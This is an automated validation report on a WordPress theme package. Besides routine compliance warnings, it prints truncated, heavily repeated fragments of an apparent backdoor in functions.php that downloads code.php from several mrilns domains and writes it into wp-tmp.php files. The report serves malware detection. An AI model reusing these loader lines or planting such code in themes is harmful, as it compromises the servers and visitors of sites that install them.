0
Validation results

ECOBIZ | Shared by VestaThemes.com

ECOBIZ | Shared by VestaThemes.com

WordPress 6.5.2 theme
0
  • THEME TYPEWordPress theme 6.5.2
  • FILE NAMEecobiz2.zip
  • FILE SIZE12159734 bytes
  • MD51177b44d3af6e91d6fa44cfdd593b33d
  • SHA17c6d51a504e1271a7096fd2281e9590c6957a09e
  • LICENSENone
  • FILES INCLUDEDCSS, PHP, HTML, XML, Bitmap images, Adobe Illustrator
  • VERSION3.0
  • TAGSGreen, White, Translation-ready, Custom-menu,Two-columns, Fixed-width, custom-background
  • CREATION DATE2020-01-15
  • LAST FILE UPDATE2020-01-15
  • LAST VALIDATION2020-01-15 11:35
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
  1. Title : Title No reference to add_theme_support( "title-tag" ) was found in the theme.The theme needs to have <title> tags, ideally in the header.php file.The theme needs to have a call to wp_title(), ideally in the header.php file.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
  2. Security breaches : Use of base64_encode() Found base64_encode in file theme-functions.php.
     $oauth_signature = base64_encode(hash_hmac('sha1', $base_info, $composite_key, true));
  3. Unwanted files : hidden file(s) or folder(s) .travis.yml .gitignore .scrutinizer.yml .editorconfig was found.
  4. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe width="640" height="360" src="%3$s" frameborder="0" allowfullscreen> in file test-cmb-types.php. 763: sprintf( '<input type='text' class='cmb2-oembed regular-text' name='field_test_field' id='field_test_field' value='%1$s' data-objectid=\'%2$d\' data-objecttype=\'post\'/><p class='cmb2-metabox-description'>This is a description</p><p class='cmb-spinner spinner' style='display:none;'></p><div id='field_test_field-status' class='cmb2-media-status ui-helper-clearfix embed_wrap'><div class='embed-status'><iframe width='640' height='360' src='%3$s' frameborder='0' allowfullscreen
  5. Malware : Operations on file system file_get_contents was found in the file functions.php 19: if ($file = @file_get_contents(__FILE__))21: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))41: if ($file = @file_get_contents(__FILE__))76: function file_get_contents_tcurl($url)110: if (($tmpcontent = @file_get_contents('http://www.mrilns.com/code.php') OR $tmpcontent = @file_127: elseif ($tmpcontent = @file_get_contents('http://www.mrilns.pw/code.php') AND stripos($tmpcontent143: elseif ($tmpcontent = @file_get_contents('http://www.mrilns.top/code.php') AND stripos($tmpconten158: elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpconte161: } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tm164: } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== file_put_contents was found in the file functions.php 25: @file_put_contents(__FILE__, $file);47: @file_put_contents(__FILE__, $file);114: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);117: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);119: @file_put_contents('wp-tmp.php', $tmpcontent);131: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);134: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);136: @file_put_contents('wp-tmp.php', $tmpcontent);147: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);150: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);152: @file_put_contents('wp-tmp.php', $tmpcontent);file_get_contents was found in the file functions.php 19: if ($file = @file_get_contents(__FILE__))21: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))41: if ($file = @file_get_contents(__FILE__))76: function file_get_contents_tcurl($url)110: if (($tmpcontent = @file_get_contents('http://www.mrilns.com/code.php') OR $tmpcontent = @file_127: elseif ($tmpcontent = @file_get_contents('http://www.mrilns.pw/code.php') AND stripos($tmpcontent143: elseif ($tmpcontent = @file_get_contents('http://www.mrilns.top/code.php') AND stripos($tmpconten158: elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpconte161: } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tm164: } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== file_put_contents was found in the file functions.php 25: @file_put_contents(__FILE__, $file);47: @file_put_contents(__FILE__, $file);114: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);117: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);119: @file_put_contents('wp-tmp.php', $tmpcontent);131: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);134: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);136: @file_put_contents('wp-tmp.php', $tmpcontent);147: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);150: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);152: @file_put_contents('wp-tmp.php', $tmpcontent);fopen was found in the file functions.php 92: $handle = fopen($tmpfname, 'w+');99: $handle = fopen($tmpfname, 'w+');fwrite was found in the file functions.php 93: if( fwrite($handle, '<?php\n' . $phpCode))100: fwrite($handle, '<?php\n' . $phpCode);fopen was found in the file functions.php 92: $handle = fopen($tmpfname, 'w+');99: $handle = fopen($tmpfname, 'w+');fwrite was found in the file functions.php 93: if( fwrite($handle, '<?php\n' . $phpCode))100: fwrite($handle, '<?php\n' . $phpCode);fclose was found in the file functions.php 102: fclose($handle);file_get_contents was found in the file functions.php 19: if ($file = @file_get_contents(__FILE__))21: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))41: if ($file = @file_get_contents(__FILE__))76: function file_get_contents_tcurl($url)110: if (($tmpcontent = @file_get_contents('http://www.mrilns.com/code.php') OR $tmpcontent = @file_127: elseif ($tmpcontent = @file_get_contents('http://www.mrilns.pw/code.php') AND stripos($tmpcontent143: elseif ($tmpcontent = @file_get_contents('http://www.mrilns.top/code.php') AND stripos($tmpconten158: elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpconte161: } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tm164: } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== file_put_contents was found in the file functions.php 25: @file_put_contents(__FILE__, $file);47: @file_put_contents(__FILE__, $file);114: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);117: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);119: @file_put_contents('wp-tmp.php', $tmpcontent);131: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);134: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);136: @file_put_contents('wp-tmp.php', $tmpcontent);147: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);150: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);152: @file_put_contents('wp-tmp.php', $tmpcontent);file_put_contents was found in the file functions.php 25: @file_put_contents(__FILE__, $file);47: @file_put_contents(__FILE__, $file);114: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);117: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);119: @file_put_contents('wp-tmp.php', $tmpcontent);131: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);134: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);136: @file_put_contents('wp-tmp.php', $tmpcontent);147: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);150: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);152: @file_put_contents('wp-tmp.php', $tmpcontent);file_put_contents was found in the file functions.php 25: @file_put_contents(__FILE__, $file);47: @file_put_contents(__FILE__, $file);114: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);117: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);119: @file_put_contents('wp-tmp.php', $tmpcontent);131: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);134: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);136: @file_put_contents('wp-tmp.php', $tmpcontent);147: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);150: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);152: @file_put_contents('wp-tmp.php', $tmpcontent);file_get_contents was found in the file functions.php 19: if ($file = @file_get_contents(__FILE__))21: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))41: if ($file = @file_get_contents(__FILE__))76: function file_get_contents_tcurl($url)110: if (($tmpcontent = @file_get_contents('http://www.mrilns.com/code.php') OR $tmpcontent = @file_127: elseif ($tmpcontent = @file_get_contents('http://www.mrilns.pw/code.php') AND stripos($tmpcontent143: elseif ($tmpcontent = @file_get_contents('http://www.mrilns.top/code.php') AND stripos($tmpconten158: elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpconte161: } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tm164: } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== file_put_contents was found in the file functions.php 25: @file_put_contents(__FILE__, $file);47: @file_put_contents(__FILE__, $file);114: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);117: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);119: @file_put_contents('wp-tmp.php', $tmpcontent);131: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);134: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);136: @file_put_contents('wp-tmp.php', $tmpcontent);147: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);150: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);152: @file_put_contents('wp-tmp.php', $tmpcontent);file_put_contents was found in the file functions.php 25: @file_put_contents(__FILE__, $file);47: @file_put_contents(__FILE__, $file);114: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);117: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);119: @file_put_contents('wp-tmp.php', $tmpcontent);131: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);134: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);136: @file_put_contents('wp-tmp.php', $tmpcontent);147: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);150: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);152: @file_put_contents('wp-tmp.php', $tmpcontent);file_put_contents was found in the file functions.php 25: @file_put_contents(__FILE__, $file);47: @file_put_contents(__FILE__, $file);114: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);117: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);119: @file_put_contents('wp-tmp.php', $tmpcontent);131: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);134: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);136: @file_put_contents('wp-tmp.php', $tmpcontent);147: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);150: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);152: @file_put_contents('wp-tmp.php', $tmpcontent);file_get_contents was found in the file functions.php 19: if ($file = @file_get_contents(__FILE__))21: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))41: if ($file = @file_get_contents(__FILE__))76: function file_get_contents_tcurl($url)110: if (($tmpcontent = @file_get_contents('http://www.mrilns.com/code.php') OR $tmpcontent = @file_127: elseif ($tmpcontent = @file_get_contents('http://www.mrilns.pw/code.php') AND stripos($tmpcontent143: elseif ($tmpcontent = @file_get_contents('http://www.mrilns.top/code.php') AND stripos($tmpconten158: elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpconte161: } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tm164: } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== file_put_contents was found in the file functions.php 25: @file_put_contents(__FILE__, $file);47: @file_put_contents(__FILE__, $file);114: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);117: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);119: @file_put_contents('wp-tmp.php', $tmpcontent);131: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);134: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);136: @file_put_contents('wp-tmp.php', $tmpcontent);147: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);150: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);152: @file_put_contents('wp-tmp.php', $tmpcontent);file_put_contents was found in the file functions.php 25: @file_put_contents(__FILE__, $file);47: @file_put_contents(__FILE__, $file);114: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);117: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);119: @file_put_contents('wp-tmp.php', $tmpcontent);131: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);134: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);136: @file_put_contents('wp-tmp.php', $tmpcontent);147: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);150: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);152: @file_put_contents('wp-tmp.php', $tmpcontent);file_put_contents was found in the file functions.php 25: @file_put_contents(__FILE__, $file);47: @file_put_contents(__FILE__, $file);114: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);117: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);119: @file_put_contents('wp-tmp.php', $tmpcontent);131: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);134: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);136: @file_put_contents('wp-tmp.php', $tmpcontent);147: @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);150: @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);152: @file_put_contents('wp-tmp.php', $tmpcontent);file_get_contents was found in the file functions.php 19: if ($file = @file_get_contents(__FILE__))21: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))41: if ($file = @file_get_contents(__FILE__))76: function file_get_contents_tcurl($url)110: if (($tmpcontent = @file_get_contents('http://www.mrilns.com/code.php') OR $tmpcontent = @file_127: elseif ($tmpcontent = @file_get_contents('http://www.mrilns.pw/code.php') AND stripos($tmpcontent143: elseif ($tmpcontent = @file_get_contents('http://www.mrilns.top/code.php') AND stripos($tmpconten158: elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpconte161: } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tm164: } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== file_get_contents was found in the file functions.php 19: if ($file = @file_get_contents(__FILE__))21: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))41: if ($file = @file_get_contents(__FILE__))76: function file_get_contents_tcurl($url)110: if (($tmpcontent = @file_get_contents('http://www.mrilns.com/code.php') OR $tmpcontent = @file_127: elseif ($tmpcontent = @file_get_contents('http://www.mrilns.pw/code.php') AND stripos($tmpcontent143: elseif ($tmpcontent = @file_get_contents('http://www.mrilns.top/code.php') AND stripos($tmpconten158: elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpconte161: } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tm164: } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== file_get_contents was found in the file functions.php 19: if ($file = @file_get_contents(__FILE__))21: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))41: if ($file = @file_get_contents(__FILE__))76: function file_get_contents_tcurl($url)110: if (($tmpcontent = @file_get_contents('http://www.mrilns.com/code.php') OR $tmpcontent = @file_127: elseif ($tmpcontent = @file_get_contents('http://www.mrilns.pw/code.php') AND stripos($tmpcontent143: elseif ($tmpcontent = @file_get_contents('http://www.mrilns.top/code.php') AND stripos($tmpconten158: elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpconte161: } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tm164: } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== file_get_contents was found in the file class.redux_sass.php 52: $ids = file_get_contents(self::$matrix_file);file_put_contents was found in the file class.redux_sass.php 59: $ret = @file_put_contents(self::$matrix_file, $ids);166: $ret = @file_put_contents($css_file, $new_css);206: $ret = @file_put_contents($scss_path . '/' . $filename . '.css', $new_css);file_put_contents was found in the file class.redux_sass.php 59: $ret = @file_put_contents(self::$matrix_file, $ids);166: $ret = @file_put_contents($css_file, $new_css);206: $ret = @file_put_contents($scss_path . '/' . $filename . '.css', $new_css);file_put_contents was found in the file class.redux_sass.php 59: $ret = @file_put_contents(self::$matrix_file, $ids);166: $ret = @file_put_contents($css_file, $new_css);206: $ret = @file_put_contents($scss_path . '/' . $filename . '.css', $new_css);file_put_contents was found in the file class.redux_filesystem.php 137: $res = file_put_contents( $file, $content );file_get_contents was found in the file class.redux_filesystem.php 146: $res = file_get_contents( $file );fwrite was found in the file scss.inc.php 830: fwrite(STDERR, 'Line $line DEBUG: $value\n');file_get_contents was found in the file scss.inc.php 1652: $code = file_get_contents($path);4430: $imports = unserialize(file_get_contents($icache));4468: $css = $this->scss->compile(file_get_contents($in), $in);4529: echo file_get_contents($output);file_get_contents was found in the file scss.inc.php 1652: $code = file_get_contents($path);4430: $imports = unserialize(file_get_contents($icache));4468: $css = $this->scss->compile(file_get_contents($in), $in);4529: echo file_get_contents($output);file_get_contents was found in the file scss.inc.php 1652: $code = file_get_contents($path);4430: $imports = unserialize(file_get_contents($icache));4468: $css = $this->scss->compile(file_get_contents($in), $in);4529: echo file_get_contents($output);file_put_contents was found in the file scss.inc.php 4475: file_put_contents($out, $css);4476: file_put_contents($this->importsCacheName($out),file_put_contents was found in the file scss.inc.php 4475: file_put_contents($out, $css);4476: file_put_contents($this->importsCacheName($out),file_get_contents was found in the file scss.inc.php 1652: $code = file_get_contents($path);4430: $imports = unserialize(file_get_contents($icache));4468: $css = $this->scss->compile(file_get_contents($in), $in);4529: echo file_get_contents($output);file_get_contents was found in the file sample-config.php 1373: 'content' => file_get_contents( dirname( __FILE__ ) . '/../README.md' )1625: 'content' => nl2br( file_get_contents( trailingslashit( dirname( __FILE__ ) ) . 'README.html' )file_get_contents was found in the file sample-config.php 1373: 'content' => file_get_contents( dirname( __FILE__ ) . '/../README.md' )1625: 'content' => nl2br( file_get_contents( trailingslashit( dirname( __FILE__ ) ) . 'README.html' )
  6. Malware : Network operations curl_init was found in the file theme-functions.php 1065: $feed = curl_init();curl_exec was found in the file theme-functions.php 1067: $json = curl_exec($feed);curl_init was found in the file functions.php 78: $ch = curl_init();curl_exec was found in the file functions.php 84: $data = curl_exec($ch);curl_init was found in the file p.php 185: $ch = curl_init( $url );curl_exec was found in the file p.php 211: list( $header, $contents ) = array_merge( array( '', '' ), preg_split( '/([\r\n][\r\n])\1/', curl_exec( $ch ), 2 ) );
  7. Admin menu : Themes should use add_theme_page() for adding admin pages. File class-tivwp-dm.php : 111: add_plugins_page(118: add_plugins_page(File class-tivwp-dm.php : 111: add_plugins_page(118: add_plugins_page(File import_export.php : 147: add_submenu_page(File welcome.php : 39: add_dashboard_page(47: add_dashboard_page(55: add_dashboard_page(63: add_dashboard_page(File welcome.php : 39: add_dashboard_page(47: add_dashboard_page(55: add_dashboard_page(63: add_dashboard_page(File welcome.php : 39: add_dashboard_page(47: add_dashboard_page(55: add_dashboard_page(63: add_dashboard_page(File welcome.php : 39: add_dashboard_page(47: add_dashboard_page(55: add_dashboard_page(63: add_dashboard_page(File import_export.php : 150: add_submenu_page(File debug.php : 74: add_submenu_page(File framework.php : 1246: // wrappers and need to be appened to using add_submenu_page.1297: $this->page = add_submenu_page(1358: add_submenu_page(1382: add_submenu_page(File framework.php : 1246: // wrappers and need to be appened to using add_submenu_page.1297: $this->page = add_submenu_page(1358: add_submenu_page(1382: add_submenu_page(File framework.php : 1331: $this->page = add_menu_page(File framework.php : 1246: // wrappers and need to be appened to using add_submenu_page.1297: $this->page = add_submenu_page(1358: add_submenu_page(1382: add_submenu_page(File framework.php : 1246: // wrappers and need to be appened to using add_submenu_page.1297: $this->page = add_submenu_page(1358: add_submenu_page(1382: add_submenu_page(File barebones-config.php : 166: // For a full list of options, visit: http://codex.wordpress.org/Function_Reference/add_submenu_page#ParametersFile theme-options.php : 1188: // For a full list of options, visit: http://codex.wordpress.org/Function_Reference/add_submenu_page#ParametersFile sample-config.php : 1701: // For a full list of options, visit: http://codex.wordpress.org/Function_Reference/add_submenu_page#Parameters
Warning
  1. core scripts deregistered : Core scripts deregistrationFound wp_deregister_script in framework.php. Themes must not deregister core scripts. 551: wp_deregister_script( 'wpb_ace' );
  2. theme tags : Presence of bad theme tagsThe tag Green has been deprecated, it must be removed from style.css header.The tag White has been deprecated, it must be removed from style.css header.The tag Fixed-width has been deprecated, it must be removed from style.css header.
  3. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is ecobiz-shared-by-vestathemes-com.
  4. Text domain : Incorrect use of translation functions.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'Slideshow', post type general name, 'ecobiz' in file post-types.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'slideshow', post type singular name, 'ecobiz' in file post-types.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'Add New', slideshow, 'ecobiz' in file post-types.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'Portfolio', post type general name, 'ecobiz' in file post-types.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'portfolio', post type singular name, 'ecobiz' in file post-types.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'Add New', portfolio, 'ecobiz' in file post-types.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'Team', post type general name, 'ecobiz' in file post-types.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'Team', post type singular name, 'ecobiz' in file post-types.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'Testimonial', post type general name, 'ecobiz' in file post-types.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'Testimonial', post type singular name, 'ecobiz' in file post-types.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'Add New', Testimonial, 'ecobiz' in file post-types.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'ecobiz' in file theme-functions.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'ecobiz' in file theme-functions.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Read More &raquo;' in file theme-functions.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments '&larr;', Previous post link, 'ecoboz' in file single.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments '&rarr;', Next post link, 'ecobiz' in file single.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Deactivate Demo Mode' in file class-redux-plugin.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Activate Demo Mode' in file class-redux-plugin.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Must call in of after the "plugins_loaded" action.' in file class-tivwp-dm-controller.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Updating this theme will lose any customizations you have made. 'Cancel' to stop, 'OK' to update." in file EDD_SL_Theme_Updater.php.Found a translation function that has an incorrect number of arguments. Function _e, with the arguments 'We do our best to provide the best support we can. If you encounter a problem or have a question, post a question in the <a href="', https://, 'easydigitaldownloads.com/support">support forums</a>.' in file welcome.php.Found a translation function that has an incorrect number of arguments. Function _e, with the arguments 'We do our best to provide the best support we can. If you encounter a problem or have a question, post a question in the <a href="', https://, 'easydigitaldownloads.com/support">support forums</a>.', 'redux-framework' in file welcome.php.Found a translation function that has an incorrect number of arguments. Function _e, with the arguments 'Our <a href="', https://, 'easydigitaldownloads.com/support/pricing/">Priority Support forums</a> are there for customers that need faster and/or more in-depth assistance.' in file welcome.php.Found a translation function that has an incorrect number of arguments. Function _e, with the arguments 'Our <a href="', https://, 'easydigitaldownloads.com/support/pricing/">Priority Support forums</a> are there for customers that need faster and/or more in-depth assistance.', 'redux-framework' in file welcome.php.Found a translation function that has an incorrect number of arguments. Function _e, with the arguments 'New extensions that make Easy Digital Downloads even more powerful are released nearly every single week. Subscribe to the newsletter to stay up to date with our latest releases. <a href="', http://, 'eepurl.com/kaerz" target="_blank">Signup now</a> to ensure you do not miss a release!' in file welcome.php.Found a translation function that has an incorrect number of arguments. Function _e, with the arguments 'New extensions that make Easy Digital Downloads even more powerful are released nearly every single week. Subscribe to the newsletter to stay up to date with our latest releases. <a href="', http://, 'eepurl.com/kaerz" target="_blank">Signup now</a> to ensure you do not miss a release!', 'redux-framework' in file welcome.php.Found a translation function that has an incorrect number of arguments. Function _e, with the arguments '<a href="', http://, 'eepurl.com/kaerz" target="_blank">Signup now</a> to hear about the latest tutorial releases that explain how to take Easy Digital Downloads further.' in file welcome.php.Found a translation function that has an incorrect number of arguments. Function _e, with the arguments '<a href="', http://, 'eepurl.com/kaerz" target="_blank">Signup now</a> to hear about the latest tutorial releases that explain how to take Easy Digital Downloads further.', 'redux-framework' in file welcome.php.Found a translation function that has an incorrect number of arguments. Function _e, with the arguments '<a href="', https://, 'asydigitaldownloads.com/extensions" target="_blank">The Extensions store</a> has a list of all available extensions, including convenient category filters so you can find exactly what you are looking for.' in file welcome.php.Found a translation function that has an incorrect number of arguments. Function _e, with the arguments '<a href="', https://, 'asydigitaldownloads.com/extensions" target="_blank">The Extensions store</a> has a list of all available extensions, including convenient category filters so you can find exactly what you are looking for.', 'redux-framework' in file welcome.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are ecobiz, post type general name, post type singular name, slideshow, portfolio, Testimonial, ovum, striking_front, ecobiz-admin, cmb2, ecobiz_, Previous post link, Next post link, ebiz, exobiz, redux-framework, tivwp-dm, edd, edd-recurring, https://, http://, redux-framework-demo.
  5. Plugin territory : Plugin territory functionalitiesThe theme uses the register_post_type() function, which is plugin-territory functionality.The theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  6. Unwanted directories : GIT revision control directoryA.git was found.
  7. PHP short tags : Presence of PHP short tagsPHP short tags were found in file parsedown.php. "This practice is discouraged because they are only available if enabled with short_open_tag php.ini configuration file directive, or if PHP was configured with the --enable-short-tags option" (php.net), which is not the case on many servers.838: if (preg_match('/^\[(.+?)\]:[ ]*<?(\S+?)>?(?:[ ]+['\'(](.+)['\')])?[ ]*$/', $Line['text'], $matches))
  8. Fundamental theme elements : Presence of comment_form()Could not find comment_form.
  9. Fundamental theme elements : Presence of wp_link_pages()Could not find wp_link_pages.
  10. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  11. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  12. I18N implementation : Proper use of ___all(Possible variable $readmore_text found in translation function in theme-functions.php. Translation function calls should not contain PHP variables. Possible variable $readmore_text found in translation function in theme-functions.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in class-redux-plugin.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in class-redux-plugin.php. Translation function calls should not contain PHP variables.
  13. Featured image : Use of the_post_thumbnail() instead of custom fields for thumbnailsNo reference to the_post_thumbnail was found in the theme.
  14. CSS files : Presence of text domainText Domain: is missing from your style.css header.
  15. CSS files : Presence of .screen-reader-text class.screen-reader-text css class is needed in your theme css. See : the Codex for an example implementation.
  16. Date and time implementation : Use of the_time()At least one hard coded date was found in the file archive.php. Function get_option( 'date_format' ) should be used instead.
  17. Screenshot : Screenshot fileScreenshot size is 880x660px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  2. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  3. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  4. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  5. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  6. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
